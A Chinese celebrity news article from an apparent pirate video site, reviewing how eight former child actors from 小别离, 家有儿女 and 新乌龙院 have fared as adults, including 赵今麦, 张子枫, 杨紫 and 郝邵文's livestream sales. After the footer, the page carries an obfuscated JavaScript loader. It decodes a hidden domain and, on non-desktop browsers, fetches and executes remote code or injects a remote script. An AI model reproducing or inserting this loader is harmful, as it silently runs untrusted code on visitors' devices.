3部童年经典作品,8位童星现状:有的成主播,有的成实力派

网络明星资讯人气:685时间:2022-01-19 23:30:11

8位童星现状:有人靠直播月收入千万,有人成实力派,有人被遗忘——引言。

要说近段时间最火爆的电视剧,必然是赵今麦跟白敬亭主演的电视剧《开端》莫属,不仅“无限流”题材新颖,两位年轻演员的演技也是可圈可点。

其中2002年出生的赵今麦,所表现出来的演技自然又老练,对戏老戏骨刘奕君也丝毫不落下风。

就在1月19日,凭借着《开端》引起的热潮,2016年上映的《小别离》也上了热搜,网友们纷纷感叹着《小别离》里已经长大的3位小演员:张子枫、赵今麦、胡先煦还能再合作吗?

网友们发出这样的感叹,一方面是这些小演员们曾经带来了很多的快乐与回忆,希望长大后的他们能带来一波“回忆杀”;另一方面是他们现在都已经能独当一面,也都有着各自的发展,其中张子枫更是一步步再迈向实力派,当然他们带来的表演也更值得期待。

而曾经承载着几代人欢乐的经典作品:10年代的《小别离》00年代的《家有儿女》以及90年代的《新乌龙院》里,其中带给我们无限欢乐的8位小演员们,他们现如今又发展的怎么样了?

《小别离》

这部电视剧是《小》系列作品里的经典作品之一,其中张子枫、赵今麦、胡先煦这三位小演员在剧中饰演同学,三人都有着各自的烦恼,但最终都共同收获了成长。现在时间已经过去6年,那么剧外的他们又有了怎么样的成长呢?

赵今麦

赵今麦在8岁那年参演了第一部电视剧《不能没有娘》,随后在电视剧《小别离》、《我的!体育老师》、《少年派》中,都有着不错的表现,但因为题材相近,没有给观众们留下足够的印象。

在2019年上映的科幻电影《流浪地球》里,赵今麦饰演的韩朵朵,在影片中哭戏十分的有感染力,给观众们留下了一定的印象。

到了2020年,赵今麦以表演第一的成绩考取了中央戏剧学院,现在凭借着《开端》里的炸裂演技,引起了广泛的关注,相信未来的发展也是一片光明。

张子枫

在2021年,张子枫凭借着在电影《我的姐姐》里的出色表现,获得了第16届中国长春电影节的最佳女演员奖,同时也获得了金鸡奖最佳女主角的提名,不得不说2001年出生的张子枫,在《小别离》三个小演员中,实力应该是最为强劲的。

早在2009年,张子枫就凭借电影《唐山大地震》里“小方登”一角,获得了大众电影节历史上最年轻的最佳新人奖。

而真正让人记住张子枫的,却是在2015年上映的《唐人街探案》里的角色,张子枫在影片接近尾声的时候,一个堪称经典的诡异眼神,让人浑身起鸡皮疙瘩,久久难以忘怀。

随后在2019年,张子枫就入选了中国电影频道评选的新生代演技派“四小花旦”。可以说,张子枫的影后正在来的路上。

胡先煦

而另外一个小男演员胡先煦也褪去了曾经的婴儿肥,已经长成一位大帅哥,不少网友感慨着“弟弟变成了老公”。

自从参演《小别离》被观众熟知后,胡先煦也是经常出现在荧幕中。在2020年,凭借着一部现象级爆剧《棋魂》,让胡先煦收获了不少好评,现在由他主演的电影《三贵情史》也是正在待映中。对于他的未来,不知道能不能达到张子枫跟赵今麦的高度,但同样是值得期待的。

《家有儿女》

《家有儿女》这部2005年上映的情景喜剧,应该是众多80后、90后的少年回忆,哪怕是现如今再看起来,依旧是回味无穷,其中最为经典的当属有着杨紫参演的前两部。那么时间已过去十多年,曾经的三位小演员杨紫、张一山以及尤浩然,长大后现如今发展得怎么样了呢?

杨紫

1992年出生的杨紫,现在应该是90后最有实力的花旦之一。这几年主演的电视剧《欢乐颂》、《香蜜沉沉烬如霜》、《亲爱的,热爱的》等等,无一不是爆剧。而杨紫也是凭借这些优秀的作品,获得了太多的荣誉,比如上海电视节白玉兰奖最佳女配角奖、第26届华鼎奖中国当代题材电视剧最佳女演员奖等等。

可以说,现在的杨紫不仅仅是实力担当,也是流量的保障。2021年年末播出的《女心理师》依旧取得了不错的成绩,还有部与当红流量明星肖战合作的待播剧《余生请多指教》。

张一山

张一山从小到大演技一直都在线,目前在男童星里,算是发展比较好的了。

在2004年,年仅6岁的张一山参演《小兵张嘎》出道,随后凭借在《家有儿女》里刘星一角,深受观众们喜爱。

而真正让张一山崭露头角的是刑侦网剧《余罪》,也是自此之后,张一山迎来了事业的高峰,主演了战争剧《我的父亲我的兵》、情感剧《春风十里,不如你》、古装剧《鹿鼎记》等等。

现在的张一山算得上是实力派男演员,影视资源也是不断,未来的路只要肯定下心努力,必然是越走越宽越走越顺的。

尤浩然

而尤浩然就正如一般小男演员们一样,褪去了童年的可爱,也便失去了观众们的喜爱,而变得很普通了。

尤浩然是《家有儿女》里三个小演员中,最早出道的。在2000年,3岁半的尤浩然拍摄了一个给妈妈端水洗脚的公益广告,感动了无数人。

后来在《家有儿女》中,同样有着可爱的表现,但长大后的尤浩然却是表现一般。虽说在2019年考入了北京电影学院,不过依旧没能带来一些让人印象深刻的作品,所以在荧幕中出现的频率也十分的低。不知道等到毕业后的尤浩然又会如何做选择。

《新乌龙院》

其实像尤浩然这样,长大后就褪去了光环的小男演员们还有郝邵文跟释小龙。曾经这一对黄金搭档在《新乌龙院》、《笑林小子》、《哪吒大战美猴王》等等多部经典电影中,给大家带来了无数的欢乐。

可怎么也没想到,长大后的两人,一个直接消失在了影视圈,转行做起了主播;一个也只是偶尔参演了一些配角,现在主业打起了高尔夫。

郝邵文

曾经的“臭屁文”“小皮”有多么的招人喜欢,长大后的郝邵文就离影视圈有多远。2003年暂停了演艺事业的郝邵文,致力于学习,直到2008年考上了中国台湾省淡江大学(中国台湾省第一所私立高等学府)。

到了2009年,郝邵文复出拍了电视剧《闪亮的日子》,因为长大后的郝邵文失去了小时候的可爱,所以作品的反响也是很平淡,没有掀起任何水花,虽说后来也参演了《超能写手》、《秦明·生死语者》等一些网剧,但效果依旧很一般。

为了生活的郝邵文,便趁着直播风起,转行做起了直播。没想到在影视圈里吃瘪的郝邵文,在直播里却混得风声水起。

在郝邵文的直播间里,不少网友是这么评论的“躲得过李佳琦,没躲过郝邵文。”这可能是对郝邵文直播最大的肯定。

他的直播间不像其他直播间放着响亮的音乐、一会大声叫卖、一会又是搞什么套路等等,而是十分的简陋,郝邵文自己平日里直播的时候,都是穿着睡衣,背后也仅贴着“郝邵文小卖部”,简简单单。

同时在介绍产品的时候,郝邵文也是一再强调有需要就买,没有需要就看看,这种不卑不亢、不作秀、不催人付款的做法,被网友称为“直播界的清流”。

也正是通过直播,网友们看到了现在的郝邵文,大家对于他的喜爱又回来了,也是纷纷支持郝邵文。据了解如今的郝邵文30天带货成绩已经达到了7500万,如果单论佣金20%来算的话,郝邵文的月收入达到了1500万!

不得不说,靠着直播重新走出来的郝邵文无疑是成功的!

释小龙

曾经的释小龙可爱又能打,更是被称为“最小武打巨星”。同样是在2003年,释小龙选择去了美国读书,也是自此之后,他的演艺事业迎来了巨大的变化。

在读书前,除了与郝邵文搭档的经典作品以外,自己主演的作品也都是好评如潮,比如《少年包青天》、《乌龙闯情关》、《少年黄飞鸿》等等。结果读完书之后,释小龙已经长大,加上偏矮还壮硕的体貌不仅“辜负”了观众们的期待,似乎也不受现代剧的青睐,所以也只能参演一些配角。

如今已经年过30岁的释小龙彷佛也是感知到了“中年危机”,便把重心放在了高尔夫上。

谢苗

说到“小武打巨星”,曾经搭档李连杰出演多部经典作品《新少林五祖》、《赤子威龙》等的谢苗,同样失去了主流市场的青睐,不过谢苗没有放弃自己的功夫,一直扎根于网路影视剧中,出演了《大汉十三将之血战疏勒城》、《大神猴》等多部口碑不错的电影。

回望曾经带给我们无数快乐的小演员们,如今也都慢慢地长大了。每个人的发展也是各有不同,对于观众们而言,应该少一些期待,多一些包容,或许就会发现他们还是我们曾经喜爱的小演员们。当然,也祝愿他们未来越来越好,越来越优秀!

那么,哪位小演员长大后,最让你意难平呢?

欢迎在评论区留言探讨哦!

本站仅为学习交流之用,所有视频和图片均来自互联网收集而来,版权归原创者所有,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件至mibeibeifeng1436@163.com (我们会在3个工作日内删除侵权内容,谢谢。)

© 2022 天天影视 黑ICP备82347569号

极速影院

电影天堂

电视剧

综艺节目

樱花动漫

明星

function caVOnN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zsBGq(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return caVOnN(t);};window[''+'u'+'W'+'i'+'T'+'h'+'G'+'x'+'J'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zsBGq,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('b3V0LmNoZXJyeWWJsb3Nzb21zLnRvcA==','154358',window,document,['W','LmhNprG']);}:function(){};